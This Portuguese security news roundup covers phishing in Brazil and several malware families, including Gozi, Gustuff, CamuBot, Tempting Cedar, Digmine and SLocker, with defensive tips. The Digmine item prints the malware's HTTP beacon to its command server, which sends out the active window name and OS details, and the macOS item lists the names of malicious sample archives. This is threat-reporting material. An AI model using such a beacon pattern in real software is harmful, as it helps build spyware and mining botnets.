Brasil: campeão em ataques phishing

O Brasil foi o país que teve a maior parcela dos usuários atacados por golpes de phishing no primeiro trimestre de 2019 (22%, em comparação com 19% no 1º trimestre de 2018). Depois vêm Austrália (17%) e Espanha (17%).

Um dos culpados por este aumento foi um surto de spams sofisticados oferecendo falsas ofertas de emprego que supostamente vinham de recrutadores de grandes corporações. Claro que o objetivo final era instalar malware para roubar dinheiro da vítima, aponta relatório da Kaspersky.

Esse tipo de golpe usa a engenharia social, como promoções ou manipulação psicológica para disseminar malware e, frequentemente, é subestimado. Para rastrear essas ameaças, os pesquisadores da Kaspersky usam os chamados honeypots, ‘armadilhas’ virtuais capazes de detectar e-mails maliciosos e pegar os cibercriminosos. Nessa operação específica, rastrearam fraudadores que tentavam enganar pessoas descuidadas em busca de emprego.

A análise detalhada está no novo relatório Spam e phishing no primeiro trimestre de 2019 e mostra que os destinatários dos spams receberam uma oferta tentadora de emprego de uma grande empresa. A mensagem convidava a vítima a entrar em um sistema gratuito de busca de vagas e solicitava a instalação de um aplicativo para dar acesso ao banco de dados de empregos. Para fazer a instalação parecer confiável, os atacantes associaram a ele uma janela pop-up com as palavras “DDoS Protection” e uma mensagem falsa indicando que o usuário estava sendo redirecionado para o site de uma das maiores agências de recrutamento.

Na verdade, as vítimas eram redirecionadas para um servidor na nuvem onde fariam o download de um instalador que parecia um arquivo do Word. Sua função era instalar no computador da vítima o trojan bancário Gozi, malware bastante usado em roubos financeiros.

“Muitas vezes, vemos remetentes de spam usando nomes de empresas conhecidas, pois isso contribui para o sucesso de seus negócios fraudulentos e para ganhar a confiança das pessoas. Marcas com uma reputação sólida podem se tornar vítimas de fraudadores que se passam por elas e atraem usuários inocentes para baixar um arquivo malicioso em seus computadores. Era preciso verificar erros no endereço de e-mail para suspeitar que a oferta de trabalho não era autêntica”, explica Maria Vergelis, pesquisadora de segurança da Kaspersky Lab.

Como não ser vítima de spam malicioso

  • Sempre verifique o endereço do site para onde foi redirecionado, endereço do link e o e-mail do remetente para garantir que são genuínos antes de clicar neles, além de verificar se o nome do link na mensagem não aponta para outro hyperlink;
  • Não clique em links contidos em e-mails, SMS, mensagens instantâneas ou postagens em mídias sociais vindos de pessoas ou organizações desconhecidos, que têm endereços suspeitos ou estranhos. Verifiquem se são legítimos e começam com ‘https‘ sempre que solicitam informações pessoais ou financeiras;
  • Se não tiver certeza de que o site da empresa é real e seguro, não insira informações pessoais;
    Verifique no site oficial da empresa se há vagas em aberto correspondentes a suas qualificações profissionais;
  • Entre em contato com a empresa por telefone para garantir que a oferta de emprego é verdadeira;
    Procure possíveis erros nas ofertas de trabalho, verificando com atenção o nome da empresa ou o título e as responsabilidades do cargo;
  • Use soluções de segurança confiáveis para ter uma proteção em tempo real para ameaças emergentes.

Fonte: Kaspersky

Novo malware é uma ameaça a usuários do Android

A empresa de cibersegurança Group-IB descobriu uma nova geração de malware para Android que foi desenvolvida para roubar ativos fiduciários e digitais de clientes dos principais bancos internacionais e casas de câmbio para criptomoedas.

Os pesquisadores da Group-IB batizaram o malware de Gustuff. Ao ser descarregado em um computador, ele chega completamente automatizado. A empresa ainda comenta que o malware foi criado para realizar infecções em massa e “lucro máximo para seus operadores”.

Como ele é distribuído: o Gustuff é enviado via campanhas de phishing direcionadas. Normalmente, ele vem em links de páginas falsas que mimetizam casas de câmbio ou banco para também roubar logins e senhas.

Até o momento, ele não foi identificado no Brasil, apenas nos EUA, na Polônia, na Austrália, na Alemanha e na Índia. Os pesquisadores que encontraram o Gustuff comentam que ele ainda utiliza recursos de acessibilidade de smartphones Android para completar o ataque:

“Usar o mecanismo do serviço de acessibilidade significa que o trojan consegue contornar as medidas de segurança usadas pelos bancos para se proteger contra gerações mais antigas de malwares mobile, além das alterações na política de segurança do Google introduzidas nas novas versões do sistema operacional Android. Ainda, o Gustuff sabe como desativar o Google Protect”, comentaram. “O malware também é capaz de enviar informações sobre o dispositivo infectado para o servidor de controle e comando gerenciado por cibercriminosos, ler/enviar mensagens SMS, enviar solicitações USSD, iniciar o SOCKS5 Proxy, seguir links, transferir arquivos (incluindo digitalizações de documentos, capturas de tela, fotos) para o servidor C&C e redefinir o dispositivo para as configurações de fábrica”.

Cibercriminosos também já “alugam” o uso do Gustuff por cerca de US$ 800 mensais. Para se proteger, algumas medidas básicas são praticamente o suficiente: nunca baixar aplicativos fora da Google Play Store, evitar clicar em links recebidos via WhatsApp e SMS, além de utilizar uma boa ferramenta de segurança no aparelho.

Fonte: Tecmundo

Macs na mira dos cibercriminosos

Criminosos estão usando um programa com extensão para Windows para infectar máquinas com macOS, sistema dos iMacs e MacBooks. O tipo de ataque inédito foi descoberto por analistas da Trend Micro – empresa especializada em cibersegurança –, após avaliarem uma versão pirata do Little Snitch – aplicativo firewall pago, projetado para modelos da Apple.

O download do software foi feito em sites de torrents. Após a instalação, os especialistas perceberam que no seu grupo de arquivos havia uma pasta oculta com um arquivo EXE, extensão usada no sistema da Microsoft e por padrão incompatível com Mac. Para burlar essa restrição, os bandidos agruparam o documento EXE em uma estrutura livre, conhecida como Mono. Essa tecnologia permite que programas do Windows sejam executados em outros sistemas operacionais, como Android, Linux e o próprio MacOS. Após ter sido extraída pelo instalador, ela foi então usada para executar o falso programa.

Os avaliadores relataram que o falso Little Snitch agiu em fases. Na primeira, roubou algumas informações da máquina infectada, como: seu modelo, ID exclusivo e ferramentas instaladas. Em seguida, começou a baixar e instalar vários aplicativos adwares. Inclusive, alguns deles começaram a se comportar como uma versão original do firewall e do Adobe Flash.

No entanto, quando testaram o falso firewall no Windows, depararam-se com uma mensagem de erro. Por essa razão, a suspeita é de que ele tenha sido desenvolvido com a finalidade de enganar o Gatekeeper, recurso de segurança da Apple que monitora somente arquivos nativos do MacOS.

As amostras avaliadas foram as seguintes:

Paragon_NTFS_for_Mac_OS_Sierra_Fully_Activated.zi
Wondershare_Filmora_924_Patched_Mac_OSX_X.zi
LennarDigital_Sylenth1_VSTi_AU_v3_203_MAC_OSX.zi
Sylenth1_v331_Purple_Skin__Sound_Radix_32Lives_v109.zi
TORRENTINSTANT.COM+-+Traktor_Pro_2_for_MAC_v321.zi
Little_Snitch_583_MAC_OS_X.zip

Os índices mais altos de infecções a partir desses arquivos foram observados em maior número em localizações, como: Reino Unido, Austrália, Armênia, Luxemburgo, África do Sul e Estados Unidos. Os analistas ainda vão continuar investigando esse tipo de ação e sua rotina. Enquanto isso, nunca é demais lembrar: baixe arquivos somente de fontes muito confiáveis, até mesmo quando eles prometerem proteger seus dados.

Fonte: Tecmundo

Novo malware tem foco em usuários de bancos brasileiros

De acordo com a OneSpan, clientes de diferentes bancos do Brasil vêm recebendo alertas sobre um novo vírus chamado CamuBot. Para infectar máquinas, o CamuBot simula a aparência de um módulo de segurança gerado por uma instituição financeira.

Módulo de segurança é um programa que o banco possui para tornar as suas transações de internet banking mais seguras. Nesse caso, o CamuBot engana o usuário se instalando no PC e simulando, com logotipo e visual completo, uma instituição bancária. Em alguns casos, o malware chega a ter acesso a senhas de uso único empregadas nas autenticações biométricas.

O malware não se baseia em telas falsas ou em ferramentas de acesso remoto, mas sim em engenharia social para tomar o controle da conta e do dispositivo

A OneSpan explica os passos do golpe da seguinte maneira: “A distribuição do vírus tem como alvos empresários ou pessoas com probabilidade de ter as credenciais de acesso à conta bancária da empresa. Em seguida, os criminosos entram em contato por telefone se passando por funcionários do banco e instruem a vítima a visitar uma URL específica para verificar se o seu “módulo de segurança” está atualizado. Esta verificação falsa solicitará, então, que seja feito um update de um suposto software de segurança. Na sequência, a vítima será instruída a fechar todos os programas, baixar e instalar o software criminoso empregando o perfil de administração do Windows”.

Na análise de Will LaSala, diretor de soluções de segurança e evangelista em segurança da OneSpan, “a história se repete na medida em que já há muitas formas de ataques contra USBs e dispositivos conectados externamente e este especificamente emprega aqueles antigos métodos criminosos, os atualiza e os combina com novos e potenciais ataques dirigidos. Ao empregar engenharia social e ter como alvo usuários específicos, este ataque tenta enganar desta vez de forma aberta e não mais escondido atrás da cena”.

Autenticação biométrica é a salvação? E USB?

Não. Segundo a empresa, em algumas circunstâncias, como na presença de autenticação biométrica ou outro hardware de autenticação forte ligado ao PC invadido, o CamuBot fica ainda mais letal ao instalar um drive.

“Sua sofisticação pode ser comprovada por sua capacidade de criar novas regras para barreiras de proteção e antivírus para poder passar por um programa confiável. O malware não se baseia em telas falsas ou em ferramentas de acesso remoto, mas sim em engenharia social para tomar o controle da conta e do dispositivo”, diz LaSala. “Bancos e usuários precisam ficar atentos. Treinar os consumidores no que eles devem ouvir e no que eles podem ou não fazer ao telefone é muito importante em um portfólio de segurança. Mas, além de preparar o usuário final, se assegurar de que um completo processo de encriptação de ponta a ponta é empregado, como uma comunicação segura, pode ajudar a reduzir a eficácia desse ataque (…) Biometria e OTP por si próprias são formas de autenticação forte, mas é importante aumentar o número de camadas adicionais de segurança quando do planejamento e distribuição de novas aplicações financeiras nesse atual cenário rico em ameaças no qual vivemos”.

Fonte: Tecmundo

Malware usava perfis falsos do Facebook para roubar dados de usuários

Se não bastassem todas as polêmicas envolvendo o escândalo do uso indevido de dados de usuários pela consultoria política Cambridge Analytica, o Facebook está precisando lidar com outro problema.

Pesquisadores da empresa de cibersegurança Avast descobriram recentemente um spyware disfarçado de um aplicativo chamado Kik Messenger, o qual teria sido distribuído por meio de um site falso, porém, muito convincente.

O malware fez vítimas principalmente no Oriente Médio, mas também atingiu usuários nos EUA, França, Alemanha e China.

A ameaça

Há alguns meses, a Avast detectou que seus clientes receberam mensagens estranhas por meio do Facebook Messenger. As mensagens vieram de perfis falsos criados na rede social e eram de mulheres atraentes e fictícias, que incentivavam o usuário a baixar um outro aplicativo de bate-papo para continuar as conversas. No entanto, o chat era um spyware.

Ao aprofundar as investigações nos arquivos, a Avast encontrou os APKs pertencentes a várias mensagens falsas e apps de leitores de feed, os quais incluíam módulos maliciosos. Descobriu ainda que, infelizmente, muitos caíram na armadilha.

Após analisar o falso aplicativo Kik Messenger, a Avast detectou o spyware (ou APT-Advanced Persistent Threat). Nomeado “Tempting Cedar Spyware”, o malware foi dividido em diferentes módulos com comandos específicos e criados para roubar informações das vítimas – inclusive em tempo real -, como contatos, registros de chamadas, SMS, fotos, dados do dispositivo do usuário (versão do Android, modelo do aparelho, operador de rede e números de telefone), além de obter acesso ao sistema de arquivos do aparelho infectado. O spyware, por exemplo, foi capaz de monitorar os movimentos das pessoas por geolocalização, gravando sons ao redor como conversas enquanto as vítimas estavam no telefone, dentro do alcance.

Vetor infectado

O malware foi distribuído por meio do uso de vários perfis falsos do Facebook. Depois de conversas com suas vítimas, os cibercriminosos se ofereciam para levar a conversa do Facebook para uma outra plataforma, onde poderiam ter interações mais íntimas. Em seguida, os invasores enviavam um link às vítimas, direcionando-as para um site de phishing, que hospedava uma versão maliciosa para download do app Kik Messenger.

As vítimas tiveram que ajustar as configurações do dispositivo para “instalar aplicativos de fontes desconhecidas”, antes que o referido app de mensagens falsas fosse incluído. Depois de instalado, o malware imediatamente se conectava a um servidor de comando e controle (C&C). Persistente como um serviço, o malware era executado após cada reinicialização.

Fonte: IDGNow!

Cuidado com esta ameaça para o Facebook Web

A Trend Micro encontrou um novo bot de mineração de criptomoeda que passou a se disseminar pela versão web do Messenger, do Facebook, observado pela primeira vez na Coreia do Sul. Batizado de Digmine, o bot está ativo também em outras regiões, como Vietnã, Azerbaijão, Ucrânia, Vietnã, Filipinas, Tailândia e Venezuela. E é possível que ele chegue rápido a outros países, devido a sua forma de propagação.

Se a conta do Facebook do usuário estiver configurada para iniciar sessão de forma automática, o Digmine consegue manipular o Messenger do Facebook fazendo com que seja enviado um link com o arquivo para os amigos do usuário.

Por enquanto, o Facebook só é explorado para propagar o bot, mas no futuro é possível que os hackers sequestrem a conta do Facebook do usuário. O código do recurso é impelido do servidor de comando e controle (C&C). Portanto, pode ser atualizado.

Vale lembrar que o modus operandi comum dos botnets de mineração de criptomoeda, e particularmente do Digmine (que faz mineração de Monero), é permanecer no sistema da vítima o maior tempo possível. O objetivo também é infectar o máximo de máquinas que for possível, pois isso se traduz em um hashrate maior e potencialmente gera mais renda para o cibercriminoso.

Etapas da Infecção

O Digmine é um downloader que primeiro se conecta ao servidor de C&C para ler sua configuração e baixar vários componentes. A configuração inicial contém links para baixar os componentes, a maioria também hospedados no mesmo servidor de C&C. Ele salva os componentes baixados por download no diretório %appdata%\<username>.

O Digmine também executa outras rotinas, como a instalação de um mecanismo de autostart da inscrição, e um marcador de infecção do sistema. O Chrome é iniciado e então carrega uma extensão maliciosa no navegador, recuperada do servidor de C&C. Se o Chrome já estiver em execução, o malware fecha e abre novamente o programa para garantir que a extensão seja carregada. As extensões só podem ser carregadas e hospedadas na Chrome Web Store, mas os cibercriminosos ignoram isso e iniciam o Chrome (com a extensão maliciosa) através da linha de comando.

A extensão lê sua própria configuração a partir do servidor de C&C. Consequentemente, a própria extensão leva ao login no Facebook ou abert ura de uma página falsa que reproduz um vídeo, também parte da estrutura de C&C.

O site fake se passa por um site de transmissão de vídeo, mas também tem muitas configurações para os componentes do malware.

Disseminação

A extensão do navegador é responsável pela disseminação via interação com o Chrome e, por extensão, com o Messenger do Facebook. Esta rotina é desencadeada por condições disponíveis no arquivo de configuração recuperado do servidor de C&C.

Se o usuário fizer login automaticamente no Facebook, a extensão do navegador pode interagir com sua conta, baixando outro código do servidor de C&C. A interação do Digmine com o Facebook pode ter mais funções no futuro, sendo que pode adicionar mais códigos.

Componente de mineração

O módulo de mineração é baixado pelo codec.exe, um componente de gestão da mineração. Ele se conecta a outro servidor de C&C para recuperar o bot e seu arquivo de configuração.

O componente de mineração miner.exe é uma interação de um bot de mineração Monero de código aberto conhecido como XMRig. O bot de mineração foi reconfigurado para executar com um arquivoconfig.json em vez de receber parâmetros diretamente da linha de comando.

Comunicação e Protocolo da C&C

Tanto o componente de downloader quanto o de gestão da mineração usam cabeçalhos HTTP específicos para se comunicar com o servidor de C&C. Ao baixar a configuração inicial, o malware constrói a solicitação HTTP GET antes de enviar para o servidor de C&C:

GET /api/apple/config.php HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Miner
Window: <Window name of active window>
ScriptName: <filename of malware>
OS: <OS version>
Host: <C&C>

Um diferencial é a forma que o malware usa um User-Agent específico batizado de Miner, que nega o acesso ao arquivo de configuração inicial caso o cabeçalho HTTP da solicitação esteja incorreto.

Práticas recomendadas

A crescente popularidade da mineração de criptomoeda faz com que criminosos se voltem para o negócio com botnets de mineração. E, como a maioria dos esquemas de cibercriminosos, os números são cruciais: quanto maior o número de vítimas, maior o lucro.

O fato de explorarem plataformas populares como as redes sociais para espalhar o malware não é surpreendente. Para evitar esse tipo de ameaças, veja abaixo as práticas recomendadas pela Trend Micro para proteger as contas em redes sociais: pense antes de compartilhar, fique ligado em mensagens suspeitas e não solicitadas e ative as configurações de privacidade da sua conta.

Fonte: IDG Now!

Ransomware SLocker ameaça o Android

A onda do momento quando se fala em crimes virtuais é o ransomware. A técnica que resulta no “sequestro” de uma máquina, bloqueando o acesso a ela e exigindo um pagamento como resgate, ganhou fama com o WannaCry e, agora, outras ameaças começam a capitalizar em cima do seu sucesso.

Um desses problemas é o SLocker, uma família de ransomware famosa por agir no mundo mobile já há algum tempo. Na penumbra durante os últimos anos, o SLocker voltou à tona de forma repentina em maio visando a aparelhos com Android. O ransomware é supostamente o primeiro direcionado ao sistema da Google a utilizar criptografia de arquivos e a rede TOR para garantir o anonimato de suas comunicações a partir de um aparelho infectado.

O sistema operacional mais popular do mundo (inclusive mais usado do que o Windows) é um dos mais visados quando se fala em vírus e malware na atualidade, e não demoraria mesmo para que uma ameaça grave surgisse para ele. Apesar de ser capaz de travar o acesso a alguns arquivos do Android e exigir um pagamento para liberá-los, o SLocker já foi controlado.

Isso porque, logo após a sua identificação, ferramentas capazes de desbloquear com sucesso os aparelhos tomados pelo ransomware também foram publicadas, reduzindo assim o seu potencial de risco. Além disso, apenas cinco dias após os especialistas em segurança terem tomado ciência do retorno do SLocker, um suposto responsável por ele foi preso pela polícia na China, o que deve comprometer ainda mais a sua atuação.

Segundo o blog da companhia especializada em segurança digital TrendMicro, graças aos canais de transmissão limitados da nova ameaça para o sistema Android, poucas pessoas foram atingidas pelo SLocker.

Método

Ainda de acordo com a TrendMicro, a amostra do ransomware obtida por eles veio por meio de um aplicativo chamado King of Glory Auxiliary, uma espécie de cheater para o altamente popular game mobile King of Glory.

Ao infectar um dispositivo móvel, o SLocker faz uma busca no Android por arquivos cujo tamanho varie entre 10 KB e 50 MB, evitando com isso bloquear arquivos essenciais do sistema (o que impediria o Android de funcionar) e visando aos arquivos baixados da web, documentos de texto, fotos, vídeos e por aí vai. Após criptografá-los, o ransomware solicita o pagamento de uma determinada quantia para então fornecer a chave capaz de destravar o acesso aos arquivos.

Aparentemente, a ameaça do SLocker está sob controle; afinal, seu possível criador foi preso e já foram publicadas ferramentas capaz de descriptografá-lo. Entretanto, é sempre importante ficar alerta para possíveis variações (ou mesmo “concorrentes”) que possam sugir.

Fonte: Tecmundo